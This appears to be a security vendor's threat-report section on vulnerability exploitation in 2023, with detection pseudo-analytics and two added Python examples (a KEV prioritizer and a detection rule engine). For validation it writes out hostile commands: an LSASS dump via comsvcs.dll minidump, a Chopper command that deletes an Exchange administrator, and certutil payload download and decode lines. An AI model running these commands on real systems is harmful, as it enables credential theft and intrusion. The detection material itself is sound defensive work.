Trend
Vulnerabilities
Despite some shiny new vulnerabilities in the headlines, adversaries’ post-exploitation playbooks have largely remained the same.
While new CVEs like the MOVEit zero day made headlines, adversaries exploited plenty of years-old (maybe less catchy) vulnerabilities throughout 2023 as well.
Addressing vulnerabilities is a fundamental part of information security, and security professionals often have mixed reactions to the disclosure of new ones. Between the catastrophic reaction of “cancel all your weekends” to the lax perspective of “that’s next month’s problem,” there is a healthy medium we can approach as a community to address vulnerabilities and prepare our organizations for malicious activity.
Vulnerabilities exist in nearly every nontrivial application, and they range wildly in severity, from the ridiculously simple to the massively complex. While many vulnerabilities don’t pose a great threat to organizations, the ones that do often play specific roles in adversary operations. For example, adversaries commonly use remote code execution (RCE) vulnerabilities in software such as Microsoft Exchange to gain a foothold in enterprise networks. SQL injection vulnerabilities can be used against misconfigured applications and database servers to allow code execution on database servers. Some vulnerabilities also provide evergreen opportunities for adversaries to deploy malware, despite being patched many years earlier. Adversaries have both a long memory and a tendency to adopt new exploitation technology rapidly, so it pays to patch early and often, or to architect your network in ways that minimally expose vulnerabilities to the internet.
What we saw in 2023
In 2023 we observed multiple high and critical severity vulnerabilities exploited in the wild, and each of them played a specific role in a larger attack path. In fact, the larger attack path was often consistent enough that the vulnerability used for initial access could easily be swapped out for new vulnerabilities as adversaries evolved. The most common path included these steps:
- Exploit a public-facing server or web application.
- Transfer a web shell or RAT.
- Get credentials.
- Move laterally from foothold.
As the year progressed, we observed vulnerabilities such as those found in TeamCity, Progress Software WS_FTP, PaperCut, and more filling that first role. Applications on Windows systems weren’t the only ones affected, either. Vulnerabilities such as CitrixBleed affected specialized network appliances designed to sit on the edge of a network, and their exploitation provided a way for adversaries to gain their foothold on systems that often did not support adequate endpoint monitoring. While new vulnerabilities often make the news, adversaries also revisited some older vulnerabilities this year, dredging up exploits for older Telerik, ManageEngine, and Fortinet vulnerabilities. It bears mentioning often: If a vulnerable application is facing the internet, it will be exploited.
Predictable post-exploitation
Immediately after exploitation, the adversaries nearly always took a step to transfer tools to that compromised system. At this point, we often observed PowerShell, certutil.exe, or curl.exe commands used to make that compromised system download a remote access tool such as Cobalt Strike or AnyDesk. In other cases, the adversary would upload a web shell to the compromised server. This was the case in the large-scale exploitation of MOVEit Transfer in May 2023. In the case of the ManageEngine exploitation mentioned earlier, the adversaries used variations of the tried-and-true Chopper web shell.
At this step, the adversaries often worked to gain credentials or escalate privileges on the initial compromised system. In the case of compromised web servers, we often observe adversaries using RottenPotato and similar exploits to escalate from web application accounts to a Windows local SYSTEM account. In other cases, adversaries would attempt to dump OS credentials using a method such as dumping the memory of LSASS.exe on Windows systems. Despite the wide variety of vulnerabilities used during initial access, credential access at this stage nearly always narrowed to the use of Mimikatz, Task Manager, or COMSVCS.dll to dump LSASS for credential access attacks. In the case of network appliances such as Citrix Application Delivery Controllers, adversaries could uncover credentials from configuration files or with additional exploits.
Once credentials were obtained, the adversaries needed to move from their initial foothold to other systems to continue their operations. Despite the variety of initial access vulnerabilities, this activity again narrowed down to just a few options. With tools such as Cobalt Strike and Windows-based RATs, adversaries could use their credentials with Windows-native protocols like WMI and SMB to move between systems and issue remote commands. Non-Windows footholds such as Citrix appliances also offered options for lateral movement, allowing adversaries to use tools like Impacket WMIexec and SMBexec to move from exploited appliances into other areas of a network.
The biggest finding for the year for us is that even if the vulnerabilities are new or rapidly changing, adversary behavior stays the same once they gain access. You can swap out pieces of the intrusion chain with a new, shiny exploit, but reality has shown us that adversaries revert to a predictable playbook once they gain access.
Take action
The best prevention is to patch, be mindful of surface area exposed to the internet, and have a good incident response plan. If you’re not sure whether your organization uses applications that have been exploited by adversaries, a good place to start evaluating is the Known Exploited Vulnerabilities Catalog maintained by CISA. You can cross-reference vulnerable applications in that catalog against applications your organization uses and evaluate the level of risk they pose.
When you do identify vulnerable applications in your organization, it’s important to take a calm and systematic approach to evaluating the vulnerabilities and prioritizing their fixes. We recommend focusing first on vulnerabilities that result in unauthenticated remote code execution and file uploads, as they can result in content being introduced to your systems without authorization. From there, you can work down the list toward less risky vulnerabilities that require complex effort or specialized circumstances to exploit.
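The cross-referencing and prioritization described in the two paragraphs above, as an added example (not the report's or CISA's own code). The catalog is a constructed sample; only the field names (cveID, vendorProject, product, shortDescription, knownRansomwareCampaignUse) follow the JSON feed CISA publishes as the author understands it, the descriptions are paraphrased rather than quoted, and the keyword lists used to sort entries into tiers are an assumption, so replace the sample with the live feed and tune the keywords before relying on it:

```python
"""Cross-reference an application inventory against a KEV-style catalog and
order the matches by the report's fix-first guidance: unauthenticated RCE and
file-upload issues first, then code execution that needs credentials, then the
rest. Added example; the catalog below is a constructed sample."""

# Keyword lists are assumptions used to bucket shortDescription text.
UNAUTH = ("unauthenticated", "authentication bypass", "without authentication")
RCE = ("remote code execution", "code execution", "execute code")
UPLOAD = ("file upload", "arbitrary file write")

SAMPLE_INVENTORY = ["Exchange Server", "ADSelfService Plus", "Windows", "Example App"]

SAMPLE_CATALOG = {
    "vulnerabilities": [
        {"cveID": "CVE-2021-26855", "vendorProject": "Microsoft", "product": "Exchange Server",
         "shortDescription": "Unauthenticated server-side request forgery that, chained with "
                             "other flaws, yields remote code execution.",
         "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-2021-40539", "vendorProject": "Zoho", "product": "ADSelfService Plus",
         "shortDescription": "Authentication bypass in the REST API leading to remote code execution.",
         "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-2021-34527", "vendorProject": "Microsoft", "product": "Windows Print Spooler",
         "shortDescription": "Improper driver validation in the print spooler allows an "
                             "authenticated user to execute code as SYSTEM.",
         "knownRansomwareCampaignUse": "Known"},
        {"cveID": "CVE-2021-30116", "vendorProject": "Kaseya", "product": "VSA",
         "shortDescription": "Credential disclosure and logic flaws that allow arbitrary file upload.",
         "knownRansomwareCampaignUse": "Known"},
        # Placeholder entry for a product not affected by anything serious.
        {"cveID": "CVE-YYYY-NNNNN", "vendorProject": "Example Vendor", "product": "Example App",
         "shortDescription": "Cross-site scripting requiring a victim to open a crafted link.",
         "knownRansomwareCampaignUse": "Unknown"},
    ]
}


def classify(description: str) -> int:
    """0 = unauthenticated RCE or file upload (fix first),
    1 = code execution that needs credentials or interaction,
    2 = everything else (work down the list)."""
    d = description.lower()
    unauth = any(k in d for k in UNAUTH)
    rce = any(k in d for k in RCE)
    upload = any(k in d for k in UPLOAD)
    if upload or (unauth and rce):
        return 0
    if rce:
        return 1
    return 2


def prioritize(inventory, catalog):
    """Return catalog entries whose product matches the inventory, ordered by
    tier, then known ransomware use, then CVE id."""
    wanted = [p.lower() for p in inventory]
    hits = []
    for entry in catalog["vulnerabilities"]:
        product = entry["product"].lower()
        # Loose substring match in both directions: "Windows" covers
        # "Windows Print Spooler", and vice versa for longer inventory names.
        if any(p in product or product in p for p in wanted):
            hits.append({
                "cveID": entry["cveID"],
                "product": entry["product"],
                "tier": classify(entry["shortDescription"]),
                "ransomware": entry.get("knownRansomwareCampaignUse") == "Known",
            })
    return sorted(hits, key=lambda h: (h["tier"], not h["ransomware"], h["cveID"]))


if __name__ == "__main__":
    for h in prioritize(SAMPLE_INVENTORY, SAMPLE_CATALOG):
        flag = " (ransomware use known)" if h["ransomware"] else ""
        print(f"tier {h['tier']}: {h['cveID']} in {h['product']}{flag}")
```

Kaseya VSA is in the sample catalog but not in the sample inventory, so it is correctly left out of the output; the remaining four entries come back with the Exchange and ADSelfService Plus entries first, the print spooler entry next, and the placeholder last.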
Detection opportunities
Vulnerability exploitation often involves manipulating network traffic and portions of memory in ways that aren’t effectively captured by endpoint detection and response sensors. As a result, we focus on behaviors that commonly occur around this exploitation. The following is a non-comprehensive running list of common suspicious behaviors we’ve observed in conjunction with vulnerability exploitation. We’ve chosen to leave detection opportunities included in the 2022 version of this report since adversaries often exploit vulnerabilities over a period of many years.
Chopper webshell commands on Windows
Chopper, often called “ChinaChopper” in some circles, executes Windows OS commands in a way that’s pretty easy to target behaviorally. The commands spawn from w3wp.exe and appear with command lines containing cmd and echo.
parent_process == w3wp.exe
&&
command_includes ("cmd.exe" && "echo")
You can use the following command to validate the above detection opportunity.
"cmd" /c cd /d "C:\inetpub\wwwroot\aspnet_client\system_web"&net group "Exchange Organization administrators" administrator /del /domain&echo [S]&cd&echo [E]
Certutil downloading additional payloads
Adversaries often use certutil.exe to download payloads during exploitation because it’s included with all Windows systems by default. It’s also pretty easy to detect downloads using the tool.
process == certutil.exe
&&
command_includes ("urlcache" && "split" && "-f")
LSASS memory dumping with COMSVCS.dll
Adversaries often follow exploitation with attempts to capture credentials from LSASS memory. One way they do this is using COMSVCS.dll to capture memory.
process == rundll32.exe
&&
command_includes ("minidump")
You can validate the above detection opportunity by running the following command:
rundll32.exe comsvcs.dll,minidump 4796 dump.dmp full
Note: The remaining detection opportunities were originally included in the 2022 Threat Detection Report but we’re including them here because adversaries may still exploit them when possible.
ProxyLogon (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065)
In March 2021, Microsoft released details of four Exchange Server vulnerabilities collectively known as “ProxyLogon.” If chained together, the vulnerabilities would allow an adversary remote code execution on a targeted Exchange server. Multiple adversaries, including the suspected Chinese state-sponsored group HAFNIUM, used the vulnerability chain to drop web shells and collect data from thousands of Exchange servers. Other adversaries used the DearCry ransomware to target unpatched servers as well. Microsoft released patches for these vulnerabilities at the time of initial reporting.
Microsoft Exchange Mailbox Replication service writing Active Server pages
Adversaries exploited ProxyLogon to drop web shells on vulnerable systems, which manifested through the msexchangemailboxreplication.exe service writing an ASPX file to disk. Malicious web shells will likely be placed on the web server in a web-accessible directory. The following analytic looks for the Exchange mailbox replication service creating ASPX files.
process == 'msexchangemailboxreplication.exe'
&&
filemod_extension == '.aspx'
ProxyShell (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473)
In July of 2021, Microsoft released details of three new vulnerabilities in Exchange Server, which were dubbed “ProxyShell.” ProxyShell exploitation allows an adversary to remotely execute code without authentication. Following the exploitation, adversaries dropped web shells to conduct reconnaissance, move laterally, and in some instances, deploy ransomware. Where ProxyLogon seemed to have a high impact over a short period of time, ProxyShell seemed to persist longer. Detecting ProxyShell exploitation is similar to ProxyLogon mentioned above, specifically msexchangemailboxreplication.exe writing an ASPX web shell to disk.
PrintNightmare (CVE-2021-34527)
Also in July of 2021, security researchers and Microsoft released details of a new vulnerability dubbed “PrintNightmare” (CVE-2021-34527). PrintNightmare permits an unprivileged user to remotely obtain elevated privileges on any system running the print spooler service, which is enabled by default. It abuses a vulnerability in how the print spooler service fails to properly authenticate users attempting to load a printer driver dynamic link library (DLL). This zero day affected all editions of Windows, allowing code execution with local SYSTEM-level privileges.
Though the vulnerability was concerning, there were not many reported campaigns exploiting it. That said, ransomware operators such as Vice Society and Magniber have exploited the vulnerability to gain initial access, and therefore it’s worth looking out for. We observed a single malicious instance of PrintNightmare exploitation leading to precursor ransomware behaviors.
Windows print spooler service spawning cmd.exe
PrintNightmare exploitation results in a shell being opened on the targeted system as a child process of the spooler service. This detection analytic identifies the Windows print spooler service spawning a shell on the system.
parent_process == spoolsv.exe
&&
process == cmd.exe
Kaseya VSA (CVE-2021-30116)
Again in July 2021, adversaries leveraged multiple vulnerabilities in Kaseya Virtual Systems Administrator (VSA) to distribute Sodinokibi ransomware, also known as REvil. VSA allows IT administrators to remotely administer endpoints. By compromising this software, an adversary gains remote execution capability to a large subset of customer endpoints, especially if Kaseya is operated by a managed service provider (MSP).
Red Canary detected the initial behavioral activity using a preexisting analytic for identifying certutil.exe decoding content, as detailed below. Our Intelligence team had tracked Sodinokibi prior to this, which helped us identify the malicious registry modification of blacklivesmatter seen below and attribute it to Sodinokibi.
Certificate utility tool (certutil.exe) decoding content
This detection analytic will detect certutil.exe running with the -decode option. Adversaries frequently leverage certutil to decode Base64-encoded content.
process == certutil.exe
&&
command_includes ('decode')
ManageEngine products (CVE-2021-40539, CVE-2021-44077, CVE-2021-44515)
In November and December of 2021, we observed likely exploitation of remote code execution vulnerabilities in two different Zoho ManageEngine products: ADSelfService Plus (CVE-2021-40539) and ServiceDesk Plus (CVE-2021-44077). In one case, an incident response partner determined that ADSelfService Plus was used for initial access prior to deploying ransomware. The FBI noted that advanced adversaries exploited a vulnerability in a third ManageEngine product, Desktop Central. ManageEngine products are widely used among IT departments to manage various services across the enterprise. As such, this presents adversaries with a wide attack surface. Organizations using ManageEngine products in their environment should update accordingly. Patches for all the vulnerabilities listed here are available via ManageEngine.
Keytool.exe spawning system shell or PowerShell
For the vulnerability in ADSelfService Plus (CVE-2021-40539), we observed adversaries use the Java utility Keytool to move a web shell from the initial directory it was dropped into. As such, keytool.exe spawning shells should be investigated, and the following detection analytic should surface related activity.
parent_process == keytool.exe
&&
process == ('cmd.exe' || 'powershell.exe')
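The pseudo-analytics above (Chopper commands from w3wp.exe, certutil downloads, COMSVCS.dll minidumps, the Exchange mailbox replication service writing ASPX files, the print spooler spawning cmd.exe, certutil decoding, and keytool.exe spawning shells) expressed as one small rule engine and run over constructed endpoint telemetry. This is an added example, not Red Canary's detection code: the event shape (process, parent_process, command_line, filemod_extension) is an assumption about what a sensor records, the sample events are invented apart from the report's own rundll32 validation command and the Chopper [S]/[E] echo markers, and the Chopper rule matches on cmd rather than cmd.exe because, as the text notes, the observed command lines start with "cmd" /c.

```python
"""The report's detection opportunities as a rule engine over constructed
telemetry. Added example; event fields and sample events are assumptions."""
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    process: str                 # image name of the process
    parent_process: str          # image name of its parent
    command_line: str = ""
    filemod_extension: str = ""  # extension of a file the process wrote, if any


@dataclass
class Rule:
    name: str
    process: tuple = ()            # fire only if the process is one of these
    parent_process: tuple = ()     # fire only if the parent is one of these
    command_includes: tuple = ()   # every substring must appear (case-insensitive)
    filemod_extension: tuple = ()  # fire only if the written file has one of these

    def matches(self, ev: ProcessEvent) -> bool:
        cmd = ev.command_line.lower()
        checks = [
            (self.process, ev.process.lower() in self.process),
            (self.parent_process, ev.parent_process.lower() in self.parent_process),
            (self.command_includes, all(s.lower() in cmd for s in self.command_includes)),
            (self.filemod_extension, ev.filemod_extension.lower() in self.filemod_extension),
        ]
        # Predicates the rule leaves empty are ignored; every specified one must hold.
        return all(ok for specified, ok in checks if specified)


RULES = [
    # The report's validation command starts with "cmd" /c, so match "cmd", not "cmd.exe".
    Rule("Chopper webshell commands on Windows",
         parent_process=("w3wp.exe",), command_includes=("cmd", "echo")),
    Rule("Certutil downloading additional payloads",
         process=("certutil.exe",), command_includes=("urlcache", "split", "-f")),
    Rule("LSASS memory dumping with COMSVCS.dll",
         process=("rundll32.exe",), command_includes=("minidump",)),
    Rule("Exchange Mailbox Replication service writing ASPX",
         process=("msexchangemailboxreplication.exe",), filemod_extension=(".aspx",)),
    Rule("Print spooler spawning cmd.exe",
         parent_process=("spoolsv.exe",), process=("cmd.exe",)),
    Rule("Certutil decoding content",
         process=("certutil.exe",), command_includes=("decode",)),
    Rule("Keytool.exe spawning system shell or PowerShell",
         parent_process=("keytool.exe",), process=("cmd.exe", "powershell.exe")),
]

# Constructed telemetry: one event per rule, then two benign events that must not fire.
SAMPLE_EVENTS = [
    ProcessEvent("cmd.exe", "w3wp.exe",
                 '"cmd" /c cd /d "C:\\inetpub\\wwwroot"&whoami&echo [S]&cd&echo [E]'),
    ProcessEvent("certutil.exe", "cmd.exe",
                 "certutil.exe -urlcache -split -f http://files.example/update.bin C:\\Windows\\Temp\\u.bin"),
    ProcessEvent("rundll32.exe", "cmd.exe", "rundll32.exe comsvcs.dll,minidump 4796 dump.dmp full"),
    ProcessEvent("msexchangemailboxreplication.exe", "services.exe", "", filemod_extension=".aspx"),
    ProcessEvent("cmd.exe", "spoolsv.exe", "cmd.exe /c whoami"),
    ProcessEvent("certutil.exe", "cmd.exe", "certutil -decode payload.txt payload.exe"),
    ProcessEvent("powershell.exe", "keytool.exe", "powershell.exe -nop -c dir"),
    ProcessEvent("certutil.exe", "explorer.exe", "certutil -verify server.cer"),     # benign
    ProcessEvent("csc.exe", "w3wp.exe", "csc.exe /noconfig /out:App_Web.dll"),      # benign ASP.NET compile
]


def evaluate(events, rules=RULES):
    """Return {rule name: [indexes of matching events]} for every rule that fired."""
    hits = {}
    for i, ev in enumerate(events):
        for rule in rules:
            if rule.matches(ev):
                hits.setdefault(rule.name, []).append(i)
    return hits


if __name__ == "__main__":
    for name, idxs in evaluate(SAMPLE_EVENTS).items():
        for i in idxs:
            ev = SAMPLE_EVENTS[i]
            print(f"[{name}] {ev.parent_process} -> {ev.process}: "
                  f"{ev.command_line or ev.filemod_extension}")
```

Each rule fires once on the sample and the two benign events stay quiet; in production the same predicates would run against real process-start and file-write telemetry, and tuning for a given environment (for example exempting known certutil certificate-management scripts) happens by adding exclusions rather than loosening the predicates.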